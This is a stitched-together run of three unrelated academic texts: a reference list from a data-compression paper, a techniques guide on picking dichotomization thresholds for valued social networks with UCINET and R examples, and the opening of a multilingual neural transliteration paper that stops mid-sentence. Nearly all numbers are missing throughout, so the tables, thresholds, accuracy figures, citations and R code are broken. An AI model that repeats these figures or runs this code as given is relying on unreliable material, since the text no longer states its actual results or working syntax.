inc. loskot p, beaulieu nc. . a family of rate / modified binary block repetition codes. in: signals, systems and computers, . conference record of the thirty-eighth asilomar conference on, vol. . piscataway: ieee, – . nagaraj n, vaidya pg, bhat kg. . arithmetic coding as a non-linear dynam- ical system. communications in nonlinear science and numerical simulation ( ): – doi . /j.cnsns. . . . pettijohn bd, hoffman mw, sayood k. . joint source/channel coding us- ing arithmetic codes. ieee transactions on communications ( ): – doi . / . . rissanen j, langdon gg. . arithmetic coding. ibm journal of research and develop- ment ( ): – doi . /rd. . . said a, pearlman wa. . a new, fast, and efficient image codec based on set par- titioning in hierarchical trees. ieee transactions on circuits and systems for video technology ( ): – doi . / . . sayood k. . introduction to data compression. burlington: morgan kaufmann. shannon c. . a mathematical theory of communication. bell system technical jour- nal : – & - , july & october doi . /j. - . .tb .x. shannon ce. . coding theorems for a discrete source with a fidelity criterion. ire national convention record : – . strogatz sh. . nonlinear dynamics and chaos: with applications to physics, biology, chemistry, and engineering. boca raton: crc press. taubman d, marcellin m. . jpeg image compression fundamentals, standards and practice: image compression fundamentals, standards and practice. boston: kluwer academic publishers. wallace gk. . the jpeg still picture compression standard. ieee transactions on consumer electronics ( ):xviii–xxxiv. nagaraj ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j.cnsns. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /rd. . http://dx.doi.org/ . / . http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /peerj-cs. © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /) connections issue | vol. article | doi: . /connections- - techniques: dichotomizing a network abstract this techniques guide provides a brief answer to the question: how to choose a dichotomization threshold? we propose a two step ap- proach to selecting a dichotomization threshold. we illustrate the approaches using two datasets and provide instructions on how to perform these approaches in r and ucinet. keywords techniques, dichotomization. there are many reasons to dichotomize valued network data. it might be for methodological rea- sons, for example, in order to use a graph-theoret- ic concept such as a clique or an n-clan, or to use methods such as ergms or saoms, which large- ly assume binary data . there is also the matter of visualizing networks, where fewer ties often yield a considerably more readable picture. it could also be for theoretical reasons. for example, in order to dis- tinguish between positive and negative ties, since tie strength or valence is often captured using a single scale, which then needs to be dichotomized in order to match the theory. finally, we might be engaging in a certain kind of data smoothing: we have collect- ed data at fine levels of differences in the strength of tie, but are not confident that small differences are meaningful. we have greater confidence in a few big buckets such as strong and weak than in gradu- ations of strength. whatever the reason, if we are going dichot- omize, the question is at what level should we di- chotomize? in some cases, the situation is guided by theoretical meaningfulness and the research de- sign. for example, suppose respondents are asked to rate others on a scale of = do not know them, = acquaintance, = friend, and = family. we see there is a loose gradation from “does not know” to “knows well”; however, categories and do not possess so much degrees of closeness as different kinds of social relations. the choice of which to use is determined by the research question. a similar ex- ample is provided by questions that ask for a range of effects from negative to positive. if respondents are asked to rate others on a scale of = dislike a lot, = dislike somewhat, = neither like nor dislike, = like somewhat, and = like a lot, for many analy- ses, it will make sense to choose a cut off of > or > for positive ties and < or < for negative ties. note that in both of the last examples, we are still confronted with a choice of two values to choose from. in addition, if the scale points are more ambig- uous than the ones above, or if the data are counts or rankings, then there is likely no a priori way of de- ciding where to dichotomize. here, we propose a two-step approach to di- chotomizing. step is to simply dichotomize at every level (or a collection of k bins) and examine the net- work produced at each level. step is to use simple analytics in order to obtain an informed rationale for a specific dichotomization threshold that makes sense for a given data set. step for step , input your valued network into your favorite network data management software and dichotomize at every level of the scale (see insert for information about how to do this in r and in ucinet). we rec- ommend always spending some time visualizing the stephen p. borgatti * and eric quintane university of kentucky, gatton college of business & econom- ics lexington, ky. school of management, the university of los andes, bogota, colombia. *e-mail: sborgatti@uky.edu. there are, of course, many methods that do not require di- chotomization. for example, we do not need to dichotomize in order to measure eigenvector centrality, nor to apply the relational event model (butts, ). techniques: dichotomizing a network table . one mode dgg women by women network projection. ev la th br ch fr el pe ru ve my ka sy no he do ol fl evelyn laura theresa brenda charlotte frances eleanor pearl ruth verne myrna katherine sylvia nora helen dorothy olivia flora figure : dgg women by women dataset dichotomized above . connections networks, which can be very informative regarding the emergence of clusters at certain levels of dichot- omization. for example, consider davis et al.’s ( ) women-by-events data (often referred to as the davis data set or the dgg data). we construct a -mode women-by-women network by multiplying the original by its transpose. the result is shown in table . if we dichotomize at > and visualize, we get figure . if we dichotomize at > , we get figure . and if we dichotomize at > , we get figure . thus, the successive dichotomizations reveal a -group structure, which is illuminating . in oth- er networks, successive dichotomization confirms a core/periphery structure. for example, the bkfrat data set (bernard et al., ) gives the number of times each pair of actors was seen interacting by an observer. the values range from to . if we dichot- omize at > , we get figure . if we dichotomize at > , we get figure . dichotomizing at > , we get figure . dichotomizing at > , we get figure . and so on. core-periphery structures have a kind of self-similarity property where the main component always looks the same regardless of what level of dichotomization produced it. step (three approaches) now, successive dichotomizations are informative, but our original question was about choosing a sin- gle dichotomization that would be used in all further analyses, which is where step becomes important. for step , we present three potential approaches. the first will horrify some people. this approach is to choose the level of dichotomization that maximizes your results. for example, suppose you are predicting managers’ performance as a function of between- ness centrality. for each possible level of dichoto- mization, you measure betweenness centrality and regress performance on betweenness, along with any control variables. the level of dichotomization that yields the highest r is the one you choose. as we said, some people (scientists, statisticians, and people of good character) will be horrified . there is definitely a danger of overfitting. the predictions work really well for this one data set, but perhaps not figure : dgg women by women dataset dichotomized above . however, this should not be taken as definitive. various normalizations of the data, as well as bipartite representa- tions, tend to show a third smaller subgroup. see freeman ( ) for a related discussion. on the other hand, these same people are happy to use regression to find the optimal coefficients to show a rela- tionship between their explanatory variable and a depend- ent. perhaps, we should ask them to choose the coeffi- cients a priori on the basis of strong theory. of course, if you have these other datasets on hand, then you could pick the level of dichotomization that yields the highest average r across all datasets. the same applies if you have multiple dvs and ivs – you pick that level of dichotomization that gives the best results across all data- sets, dvs, and ivs. techniques: dichotomizing a network for others, . the other issue is that the particular di- chotomization value that scores highest may be an odd value that you cannot explain. for example, sup- pose we carry out this procedure and get the results shown in table . clearly, we would choose , but how to make sense of these results? they rise and fall with no rhyme or reason. in this case, we would strongly advise against taking this approach. on the other hand, if the results were something like those presented in table , we would be comforted by the underlying regular- ity and feel good about choosing , even though we might be hard-pressed to explain why medium density worked best. a slightly less controversial version of this ap- proach might be to choose the dichotomized version of your network that maximizes the repli- cation of results from past studies. for example, we know from past studies that actors with higher levels of self-monitoring are more likely to receive figure : bks fraternity dataset dichotomized above . figure : dgg women by women dataset dichotomized above . connections more friendship nominations. we could choose the dichotomization threshold that maximizes the relationship between self-monitoring and new friendship nominations, even if the test of our hy- pothesis has to do with betweenness centrality and performance. that was the first approach. the second approach is less controversial. dichotomization, by its very nature, is a distortion of the data . where once you had nuance, you now have just ‘has tie’ and ‘not tie.’ this does violence to your data. the question is, how figure : bks fraternity dataset dichotomized above . clearly, in some cases, distorting the data is what we are looking for, for example, when distinguishing between neg- ative and positive ties. in this case, we should not expect the dichotomized data to preserve the properties of the original dataset and we should either use a theoretically or literature driven approach or revert to approach . figure : bks fraternity dataset dichotomized above . techniques: dichotomizing a network much? suppose, as in an analysis of variance, you predicted your valued data from your dichotomized data. some cutoff values are going to yield better pre- dictions than others. here is an example using the da- vis, gardner, and gardner women-by-women data. in the table below, the first column is the dichotomization value. for example, value means that the data were dichotomized at ≥ . dichotomizing at ≥ results in a network with ties, which corresponds to a density of . . the interesting part is the correlation column, which achieves its maximum at ≥ (correlation . ). the correlation refers to the correlation between the original valued matrix and the dichotomized matrix. a correlation of . is extremely high. yes, the data table . r-square of models predicting performance using betweenness centrality at different levels of dichotomization. dichot. level r . . . . . . . . . table . r-square of models predicting performance using betweenness centrality at different levels of dichotomization. dichot. level r . . . . . . . . . figure : bks fraternity dataset dichotomized above . connections are distorted by dichotomizing, but the dichotomized matrix still retains a very high resemblance to the origi- nal data. we have chosen a level of dichotomization that does the least violence to the original data (table ). interestingly, ≥ is the level just below the one at which the network splits into two large components (along with four isolates). at ≥ , the network looks like this, as shown in figure the third approach is theory based, and can be harder to implement. there are certain cases where we can use the emergent properties of the dichot- omized networks themselves in order to identify the correct dichotomization threshold, just like when we noticed the appearance of clusters while visually in- specting different dichotomization thresholds in the dgg data. as an example, let us consider an ap- proach proposed by freeman ( ) to distinguish between weak and strong ties. in his piece on the strength of weak ties, granovetter ( ) argues that an important characteristic of strong ties is that if a is strongly tied to b, and b is strongly tied to c, then a is likely to be at least weakly tied to c. in his analysis of the dgg data, freeman ( ) refers to granovetter’s transitivity rule as g-transitivity. a data set is perfectly g-transitive if there are no violations of g-transitivity. given a valued data set (and selecting a value such as zero as an indicator of no ties), freeman’s proposal is to dichotomize the data set at every possible cutoff and calculate the number of violations of g-transitivity at each level. the lowest cutoff with an acceptable number of violations (such as zero) identifies the strong tie. for example, applied to the davis women data, we get table . the table shows that at ≥ , the number of g- transitive triples is and the number of intransitive triples is . hence, ties or above are strong ties, and ties < but > are weak ties. combining this with our previous approach, we might summarize the situation as follows. dichoto- mizing at ≥ optimally identifies ties of any kind in terms of the least-violence criterion, and maintains a single large component (plus isolates). dichotomizing at ≥ identifies strong ties, which strongly fragment the network. the latter is useful for sharply outlining a subgroup structure, while the former enables the calculation of measure that requires connected net- works (aside from isolates) (figure ). table . z-score, correlation, number of ties and density of the dgg dataset at different dichotomization levels. value z-score correlation ties density . . . . . . . . . . . . . . . − . . . − . . . − . . table . number of g-transitive and intransitive triples in the dgg dataset at different dichotomization levels. value trans intrans , , , techniques: dichotomizing a network it is worth noting that freeman’s approach needs not be limited to maximizing g-transitivity. on theoretical grounds, we may identify a specific mechanism that organizes ties. for example, we may see a status mechanism such at the matthew effect in which nodes that already have a lot of ties tend to attract even more ties. now, to dichotomize valued data, we choose the cutoff that maximizes the extent to which there are just a few nodes with many ties and a great many nodes with few ties. alternatively, we might choose the cutoff to maximize the level of transitivity in the network. conclusion this “how to” guide on dichotomization is intend- ed to provide guidance on how to find a suitable threshold for dichotomization for social network data. we propose that in all cases, we should start by creating multiple versions of the dichotomized network at every possible value of the threshold and inspect them visually. then, we suggest three sepa- rate approaches in order to choose (and justify your choice of) a single threshold based on (i) maximiz- figure : dgg women by women dataset dichotomized at . strong ties in bold. figure : dgg women by women dataset dichotomized at . connections ing expected results, (ii) minimizing distortions, and (iii) identifying specific emergent properties in the network. references bernard, h., killworth, p. and sailer, l. . in- formant accuracy in social network data iv. social net- works : – . butts, c.t. . a relational event framework for social action. sociological methodology : – . davis, a., gardner, b. b. and m. r. gardner . deep south, chicago: the university of chicago press. freeman, l.c. . finding social groups: a meta-analysis of the southern women data, in breiger, r., carley, k., and pattison, p. (eds), dynamic social network modeling and analysis: workshop summary and papers committee on human factors, national research council: – , national acade- mies press. granovetter, m. . the strength of weak ties. american journal of sociology : – . techniques: dichotomizing a network figure a : screenshot of netdraw. addendum – ucinet to visualize successive dichotomizations in ucinet, one opens the valued data as usual and presses the + sign in the rels tab at right to raise the level of di- chotomization by one unit, see figure a , below. this can also be done in the command line intern- face (cli) as follows: ->d = dichot(women ge ) ->d = dichot(women ge ) ->d = dichot(women ge ) etc. addendum – r script #import the davis data set in r, assuming that it is already in a text file, for example exported from ucinet. library(readr) davis <- as.matrix(read.csv(“davis.txt”,sep = “\t”, row.names = )) #create a one-mode network by multiplying the original matrix by its transpose davisonemode <- davis %*% t(davis) diag(davisonemode) <- #dichotomize the network at all values davisonemodedic <- array(dim = c(nrow(davi- sonemode),ncol(davisonemode),max(davisone- mode))) for (i in :max(davisonemode)) { davisonemodedic[,,i] <- ifelse(davisonemode >= i, , ) } #visualize all networks library(sna) par(mfrow = c( , )) for (i in :max(davisonemode)) { plot(as.network(davisonemodedic[,,i])) } #correlation between original network and dichot- omized networks, and some descriptive statistics stats <- array(dim = c(max(davisonemode), )) colnames(stats) <- c(“threshold”, “correlation”, “num of s”, “density”) for (i in :max(davisonemode)) { stats[i, ] <- i stats[i, ] <- summary(qaptest(list(davisonemode, davisonemodedic[,,i]), gcor, g = , g = ))$test stats[i, ] <- sum(davisonemodedic[,,i]) stats[i, ] <- stats[i, ]/(nrow(davisonemode)*(n- row(davisonemode) - )) } stats connections figure a : screenshot of ucinet’s interactive dichotomization routine’s results. in addition, the network could be drawn after each step: ->draw d ->draw d etc. to compute the correlation between an original data set and successive dichotomizations of it, we can use ucinet’s transform|interactively dichoto- mize procedure. figure a below shows this proce- dure applied to the dgg women data. finally, to execute freeman’s strong-weak-null tie decomposition based on g-transitivity, we can use ucinet’s command line interface (cli) as shown in table a . table a . g-transitivity decomposition command line instruction and output in ucinet. ->dsp gtrans(women) level trans intrans possible prop trans -------- -------- -------- -------- -------- . , , . , , . , , . leveraging orthographic similarity for multilingual neural transliteration anoop kunchukuttan , mitesh khapra , gurneet singh , pushpak bhattacharyya {anoopk,pb}@cse.iitb.ac.in, {miteshk,garry}@cse.iitm.ac.in department of computer science & engineering indian institute of technology bombay, mumbai, india. department of computer science & engineering indian institute of technology madras, chennai, india. abstract we address the task of joint training of translit- eration models for multiple language pairs (multilingual transliteration). this is an in- stance of multitask learning, where individ- ual tasks (language pairs) benefit from shar- ing knowledge with related tasks. we fo- cus on transliteration involving related tasks i.e., languages sharing writing systems and phonetic properties (orthographically similar languages). we propose a modified neural encoder-decoder model that maximizes pa- rameter sharing across language pairs in order to effectively leverage orthographic similar- ity. we show that multilingual transliteration significantly outperforms bilingual translitera- tion in different scenarios (average increase of % across a variety of languages we experi- mented with). we also show that multilingual transliteration models can generalize well to languages/language pairs not encountered dur- ing training and hence perform well on the ze- roshot transliteration task. we show that fur- ther improvements can be achieved by using phonetic feature input. introduction transliteration is a key building block for multi- lingual and cross-lingual nlp since it is essential for (i) handling of names in applications like ma- chine translation (mt) and cross-lingual information retrieval (clir), and (ii) user-friendly input meth- ods. the transliteration problem has been exten- sively studied in literature for a variety of language pairs (karimi et al., ). previous work has looked at the most natural setup - training on a single lan- guage pair. however, no prior work exists on jointly training multiple language pairs (referred to as mul- tilingual transliteration henceforth). multilingual transliteration can be seen as an in- stance of multi-task learning, where training each language pair constitutes a task. multi-task learning works best when the tasks are related to each other, so sharing of knowledge across tasks is beneficial. thus, multilingual transliteration can be beneficial, if the languages involved are related. we identify such a natural and practically useful scenario: mul- tilingual transliteration involving languages that are related on account of sharing writing systems and phonetic properties. we refer to such languages as orthographically similar languages. we say that two languages are orthographically similar if they have: (i) highly overlapping phoneme sets, (ii) mutually compatible orthographic systems, and (iii) similar grapheme to phoneme mappings. for instance, indo-aryan languages largely share the same set of phonemes. they use different in- dic scripts, but correspondences can be established between equivalent characters across scripts. for example, the hindi (devanagari script) character क (ka) maps to the bengali ক (ka) which stands for the consonant sound (ipa: k). the grapheme to phoneme mapping is also consistent for equiva- lent characters. we can identify two major sources of orthographic similarity: (a) genetic relationship between languages (groups like romance, slavic, indo-aryan and turkic languages) (b) prolonged contact between languages over a long period of time, e.g. convergence in phonological properties of the indo-aryan and dravidian languages in the in- dian subcontinent, most strikingly retroflex conso- nants (subbārāo, ). dravidian and indo-aryan languages use compatible indic scripts. another transactions of the association for computational linguistics, vol. , pp. – , . action editor: mona diab. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. example is the nigerian linguistic area comprising niger-congo languages like yoruba, fula, igbo and afro-asiatic languages like hausa (the most widely spoken language in nigeria). most languages use the latin script (some use ajani, a modified arabic script). in this work, we explore multilingual translit- eration involving orthographically similar lan- guages. to the best of our knowledge, ours is the first work to address the task of multilingual transliteration. we propose that transliteration in- volving orthographically similar languages is a sce- nario where multilingual training can be very ben- eficial. since these languages share phonological properties, the transliteration tasks are clearly re- lated. we can utilize this relatedness by sharing the vocabulary across all related languages. the grapheme-to-grapheme correspondences enable vo- cabulary sharing. it helps transfer knowledge across languages while training. for instance, if the net- work learns that the english character l maps to the hindi character ल (la), it would also learn that l maps to the corresponding kannada character ಲ (la). data from both kannada and hindi datasets will reinforce the evidence for this mapping. a sim- ilar argument can be made when both the source and target languages are related. the grapheme- grapheme correspondences arise from the underly- ing phoneme-phoneme correspondences. the con- sistent grapheme-phoneme mappings help establish the grapheme-grapheme correspondences. due to the utilization of language relatedness, the benefits that are typically ascribed to multi-task learning (caruana, ) may also apply to mul- tilingual transliteration. since related languages share characters, it is possible to share representa- tions across languages. this may help to generalize transliteration models since joint training provides an inductive bias which prefers models that are better at transliterating multiple language pairs. the train- ing may also benefit from implicit data augmenta- tion since training data from multiple language pairs is available. from the perspective of a single lan- guage pair, data from other language pairs can be seen as additional (noisy) training data. this is par- ticularly beneficial in low-resource scenarios. our work adds to the increasing body of work investigating multilingual training for various nlp tasks like pos tagging (gillick et al., ), ner (yang et al., ; rudramurthy et al., ) and machine translation (dong et al., ; firat et al., ; lee et al., ; zoph et al., ; johnson et al., ) with a view to learn models that gen- eralize across languages and make effective use of scarce training data. the following are the contributions of our work: ( ) we propose a compact neural encoder-decoder model for multilingual transliteration, that is de- signed to ensure maximum sharing of parameters across languages while providing room for learning language-specific parameters. this allows greater sharing of knowledge across language pairs by lever- aging orthographic similarity. we empirically show that models with maximal parameter sharing are ben- eficial, without increasing the model size. ( ) we show that multilingual transliteration ex- hibits significant improvement in transliteration ac- curacy over bilingual transliteration in different sce- narios (average improvement of %). our results are backed by extensive experiments on languages across orthographically similar language groups. ( ) we perform an error analysis which suggests that representations learnt by the encoder in multilin- gual transliteration can reduce transliteration ambi- guities. multilingual transliteration also seems bet- ter at learning canonical transliterations instead of alternative, phonetically equivalent transliterations. these could explain the improved performance of multilingual transliteration. ( ) we explore the zeroshot transliteration task (i.e., transliteration between languages/language pairs not seen during training) and show that our multi- lingual model can generalize well to unseen lan- guages/language pairs. notably, the zeroshot transliteration results mostly outperform the direct bilingual transliteration model. ( ) we have richer phonetic information at our dis- posal for some related languages. we propose a novel method to incorporate phonetic input in the model and show that it provides modest gains for multilingual transliteration. the rest of the paper is organized as follows. sec- tion discusses related work. section formalizes the multilingual transliteration task and describes our proposed solution. sections and discuss the ex- perimental setup, results and analysis. section dis- cusses various zeroshot transliteration scenarios, our solutions and the results of experiments. section discusses incorporation of phonetic information for multilingual transliteration. section concludes the work and discusses future directions. related work general transliteration methods previous work on transliteration has focused on the scenario of bilingual training. until recently, the best- performing solutions were discriminative statistical transliteration methods based on phrase-based statis- tical machine translation (bisani and ney, ; ji- ampojamarn et al., ; jiampojamarn et al., ; finch and sumita, ). recent work has explored bilingual neural transliteration using the standard neural encoder-decoder architecture (with attention mechanism) (bahdanau et al., ) or its adap- tions (finch et al., ; finch et al., ). using target bidirectional lstm with model ensembling, finch et al. ( ) have outperformed the state-of- the-art phrase-based systems on the news shared task datasets. on the other hand, we focus on mul- tilingual transliteration with the encoder-decoder ar- chitecture or its adaptations. the two strands of work are obviously complimentary. multilinguality and transliteration to the best of our knowledge, ours is the first work on multi- lingual transliteration. jagarlamudi and daumé iii ( ) have proposed a method for transliteration mining (given a name and candidate transliterations, identify the correct transliteration) across multiple languages using grapheme to ipa mappings. note that their model cannot generate transliterations; it can only rank candidates. some literature mentions multilingual transliteration (surana and singh, ; he et al., ; prakash, ; pouliquen et al., ) or multilingual transliteration mining (kle- mentiev and roth, ; yoon et al., ). in these cases, however, multilingual refer to methods which work with multiple languages (as opposed to joint training - the sense of the word multilingual as we use it). multilingual translation our work on multilin- gual transliteration is motivated by recently pro- posed multilingual neural machine translation archi- tectures (firat et al., ). broadly, these proposals can be categorized into two groups. one group con- sists of architectures that specialize parts of the net- work for particular languages: specialized encoders (zoph et al., ), decoders (dong et al., ) or both (firat et al., ). the other group tries to learn more compact networks with little special- ization across languages by using a joint vocabu- lary (johnson et al., ; lee et al., ). for multilingual transliteration, we adopt an approach that is closer to the latter group since the languages under consideration use compatible scripts result- ing in a shared vocabulary. we specialize just the output layer for target languages, but share the en- coder, decoder and character embeddings across lan- guages. in this respect, we differ from johnson et al. ( ). they share all network components across languages, but add an artificial token at the begin- ning of the input sequence to indicate the target lan- guage. zeroshot transliteration we use the multilin- gual models to address zeroshot transliteration. ze- roshot transliteration using bridge/pivot language has been explored for statistical machine transliter- ation (khapra et al., ) as well as neural ma- chine transliteration (saha et al., ). unlike pre- vious approaches which pivot over bilingual translit- eration models, we propose zeroshot transliteration that pivots over multilingual transliteration mod- els. we also propose a direct zeroshot transliter- ation method, a scenario which has been explored for machine translation by johnson et al. ( ), but not investigated previously for transliteration. in our zeroshot model, sequences from multiple source languages are mapped to a common encoder rep- resentation without the need for a parallel corpus between the source languages. another work, the correlational encoder-decoder architecture (saha et al., ), maps source and pivot languages to a common space but requires a source-pivot parallel transliteration corpus. multilingual transliteration learning we first formalize the multilingual transliteration task and then describe our proposed solution. shared lstm decoder shared cnn encoder shared character embedding layer l output layer shared attention network t e n d u l k a r त ◌े ◌ं द ◌ु ल क र l output layer ത െ◌ ൻ ഡ ◌ു ൽ ക ◌് ക ർ context vector previous state & output annotation vectors (a) network architecture e r n a k u l a m convolution (with same padding) + relu stride= character embeddings output of convolution max pooling (with same padding) stride= annotation vectors filter width= pool width= filter width= (b) cnn encoder figure : multilingual neural transliteration architecture . task definition the multilingual transliteration task involves learn- ing transliteration models for l language pairs (si, ti) ∈ l (i = to l), where l ⊂ s × t , and s, t are sets of source and target languages respectively. the languages in each set are orthographically simi- lar. s and t need not be mutually exclusive. we are provided with parallel transliteration cor- pora for these l language pairs (di, ∀i = to l). the goal is to learn a joint transliteration model for all language pairs which minimizes an appropriate loss function over all the transliteration corpora. m ∗ = argmin m l(m, d) ( ) where m is the candidate joint transliteration model and d=(d , d , ..., dl) is training data for all lan- guage pairs, l is the training loss function given the model and the training data. we focus on practical training scenarios: similar source languages: we have multiple ortho- graphically similar source languages and a single tar- get language which is not similar to the source lan- guages. this is an instance of many-to-one learning, e.g., indic languages to english. similar target languages: we have multiple or- thographically similar target languages and a single source language which is not similar to the target lan- guages. this is an instance of one-to-many learning, e.g., english to indic languages. all similar languages: we have multiple source languages as well as target languages, which are all orthographically similar. this is an instance of many-to-many learning, e.g., indic-indic languages. . proposed solution we propose a neural encoder-decoder model for multilingual transliteration. for each source-target language pair (s, t), the network models ps,t = p(ytj |ytj− ...yt , xs), where xs is the input character sequence and ytj is j th element of the output charac- ter sequence yt. note that we design a single network to represent all the ps,t distributions corresponding to the set of language pairs l. our network is an adaptation of the standard encoder-decoder model with attention (bahdanau et al., ). we describe only the salient aspects of our network and refer the reader to bahdanau et al. ( ) for the basic encoder-decoder architecture. figure a shows the network architecture of our multilingual translitera- tion system. encoder & decoder: we used a cnn encoder to encode the character sequence. it consists of a single convolutional layer (stride size = and same padding), followed by relu units and max pooling. we use filters of different sizes and con- catenate their output to produce the encoder out- put. figure b shows a schematic of the encoder. we chose cnn over the conventional bidirectional lstm layer since the temporal dependencies for transliteration are mostly local, which can be han- dled by the cnn encoder. we observed that train- ing and decoding are significantly faster, with little impact on accuracy. the decoder contains a layer of lstm cells and their start state is the average of the encoder’s output vectors (sennrich et al., ). parameter sharing: the vocabulary of the ortho- graphically similar languages (at input and/or out- put) is comprised of the union of character sets of all these languages. since the character set of these lan- guages overlaps to a large extent, we share their char- acter embeddings too. the encoder is shared across all source languages and the decoder is shared across all target languages. the network uses a shared attention mechanism. the attention network is comprised of a single feed- forward layer, which predicts the attention score given the previous decoder output, previous decoder state and encoder annotation vector. the output layer (a fully connected feedforward layer) transforms the decoder lstm layer’s output to the size of the output vocabulary, and a softmax function is applied to convert the output scores to probabilities. each target language has its own set of output layer parameters. barring the output layer, all network parame- ters (input embeddings, output embeddings, at- tention layer, encoder and decoder) are shared across all similar languages. this allows maxi- mum transfer of information for multilingual learn- ing, while the output layer alone specializes for the specific target language. compared to using a target language tag in the input sequence (johnson et al., ), we believe our approach allows the language- specific parameters to directly influence the output characters. training objective and model selection: we minimize the average negative likelihood of paral- lel training corpora across all language pairs. we determined the hyperparameters which gave best re- sults on a validation set. after training the model for a fixed number of iterations (sufficient for conver- gence), we select the model with the maximum ac- curacy on the validation set for each language pair. for instance, if the model corresponding to the nd epoch reported maximum accuracy on the validation set for english-hindi, this model was used for report- ing test set results for english-hindi. we observed that this criterion performed better than choosing the model with least validation set loss over all language pairs. experimental setup we describe our experimental setup. network details: the cnn encoder has filters (widths to ) of hidden units each in the con- volutional layer (encoder output size= ). we use a stride size of and the same padding for the convolutional and max-pooling layers. the decoder is a single layer of lstm units. we used the same configuration for both bilingual and multilin- gual experiments across all datasets for convenience after exploration on some language pairs. we apply dropout (srivastava et al., ) (probability= . ) at the output of the encoder and decoder, and sgd with the adam optimizer (kingma and ba, ) (learn- ing rate= . ). we trained our models for a max- imum of epochs (which we found sufficient for our models to converge) and a batch size of . in each training epoch, we cycle through the parallel corpora of each language pair. the parallel corpora are roughly of the same size. better training sched- ules could be explored in future. languages: we experimented with two sets of or- thographically similar languages: indian languages: (i) hindi (hi), bengali (bn) from the indo-aryan branch of indo-european fam- ily (ii) kannada (kn), tamil (ta) from the dravid- ian family. we studied indic-indic transliteration and transliteration involving a non-indian language (english↔indic). we mapped equivalent characters in different indic scripts in order to build a common vocabulary based on the common offsets of the uni- code codepoints (kunchukuttan et al., ). slavic languages: czech (cs), polish (pl), slovenian (sl) and slovak (sk). we studied arabic↔slavic transliteration. arabic is a non-slavic language (semitic branch of afro-asiatic) and uses an abjad script in which vowel diacritics are omitted in gen- eral usage. the languages chosen are representative of lan- guages spoken by some major groups of peoples en-indic indic-en indic-indic ar-slavic en-hi k hi-en k bn kn ta ar-cs k en-bn k bn-en k hi ar-pl k en-kn k kn-en k bn ar-sl k en-ta k ta-en k kn ar-sk k table : training set statistics for different datasets (number of word pairs). validation set: k (en→indic & ar↔slavic), (indic→en, indic-indic). test set: k (all pairs). pair src tgt en-hi kanaklata कनकलता (kanakalata) en-kn lehmann ಹಮ (l.ehaman) (a) english-indic pair src tgt pl-ar dumitrescu دومیرتسكو (dwmytrskw) cs-ar maurice موریس (mwrys) (b) slavic-arabic table : examples of transliteration pairs from our datasets which exhibit orthographic similarity: indic, ro- mance, germanic, slavic, etc. these languages are spoken by around billion people. so our approach addresses a major chunk of the world’s people. datasets: (see table for statistics of datasets). we used the official news shared task dataset (banchs et al., ) for english to indic transliteration. this dataset has been used for many editions of the news shared tasks. we split the news training dataset as the train and valida- tion data for indic-english transliteration. for test- ing, we used the news dev-test set. we cre- ated the indian-indian parallel transliteration corpora from the english to indian language training corpora of the news dataset by mining name pairs which have english names in common. we mined the arabic-slavic dataset from wiki- data (vrandečić and krötzsch, ), a structured knowledge base containing items (roughly entities of interest). each item has a label (title of item page) which is available in multiple languages. we ex- tracted labels from selected items referring to named entities (persons, organizations and locations) to en- sure that we extract parallel transliterations (as op- posed to translations). pair p b m pair p b m similar source and target languages indic-indic ( . %) bn-hi . . . kn-bn . . . bn-kn . . . kn-ta . . . hi-bn . . . ta-hi . . . hi-ta . . . ta-kn . . . similar source languages slavic-arabic ( . %) indic-english ( . %) cs-ar . . . bn-en . . . pl-ar . . . hi-en . . . sk-ar . . . kn-en . . . sl-ar . . . ta-en . . . similar target languages arabic-slavic ( . %) english-indic ( . %) ar-cs . . . en-bn . . . ar-pl . . . en-hi . . . ar-sk . . . en-kn . . . ar-sl . . . en-ta . . . table : comparison of bilingual (b) and multilin- gual (m) neural models as well as bilingual pbsmt (p) models (top- accuracy %). figure in brackets for each dataset shows average increase in translit- eration accuracy for multilingual neural model over bilingual neural model. best accuracies for each lan- guage pair in bold. evaluation: we use top- exact match accuracy as the evaluation metric (banchs et al., ). this is one of the metrics in the news shared tasks on transliteration. results and discussion we discuss and analyze the results of our experi- ments. . quantitative observations table compares results of bilingual (b) and mul- tilingual (m) neural models as well as a bilingual transliteration system (p) based on phrase-based sta- tistical machine transliteration (pbsmt). the pb- smt system was trained using moses (koehn et al., ) with no lexicalized reordering and uses mono- tonic decoding. we used a -gram character lan- guage model trained with witten-bell smoothing. we observe that multilingual training substan- tially improves the accuracy over bilingual training in all datasets (an average increase of . % over all language pairs). transliteration accuracy increases in all scenarios: (i) similar sources (ii) similar tar- gets and (iii) similar sources & targets. if we look at results for various language groups, transliteration involving slavic languages and ara- bic benefits more than transliteration involving in- dic languages and english. arabic→slavic translit- eration shows maximum improvement (average: . %) while english→indic pairs show minimum improvement (average: . % ). we also see that the multilingual model shows significant improvements over a bilingual translit- eration system based on phrase-based smt. the pbsmt system is better than the bilingual neural transliteration system in most cases. this is consis- tent with previous work (finch et al., ), where the standard encoder-decoder architecture (with at- tention mechanism) (bahdanau et al., ) could not outperform pbsmt approaches. however, a model using target bidirectional lstm with model ensembling (finch et al., ) outperforms pbsmt models. these improvements are orthogonal to our work and could be used to further improve the bilin- gual as well as multilingual systems. the bilingual neural network models are not able to outperform the pbsmt models possibly due to the small size of the datasets and the limited depth of the network (single layer encoder and decoder). . qualitative observations we see that multilingual transliteration is better than bilingual transliteration in the following aspects: • vowels are generally a major source of translit- eration errors (kumaran et al., ; kunchukut- tan and bhattacharyya, ) because of ambigui- ties in vowel mappings. we see a major decrease in vowel errors due to multilingual training (aver- age decrease of ∼ %). we observe substantial de- crease in long-short vowel confusion errors (indic languages as target languages) and insertion/deletion of a (english/slavic as target). we also see a ma- jor improvement in arabic→slavic transliteration. the arabic script does not represent vowels, hence the transliteration system needs to correctly generate vowels. the multilingual model is better at generat- ing vowels compared to the bilingual model. • we also observe that consonants with similar pho- netic properties are a major source of transliteration source b m باستور (bastwr) bastor pastor كیلني (kylyn) kelen kailin (a) arabic-czech examples source b m व जर्ल (varjila) vergill virgil ए लसन (elisana) elissan ellison (b) hindi-english examples table : examples of bi- vs. multi-lingual outputs. ar and hi text are also shown using buckwalter and itrans romanization schemes respectively errors, and these show a substantial decrease with multilingual training. for indic-english translitera- tion, we see substantial error reduction in the follow- ing character pairs k-c, t-d, p-b. we also 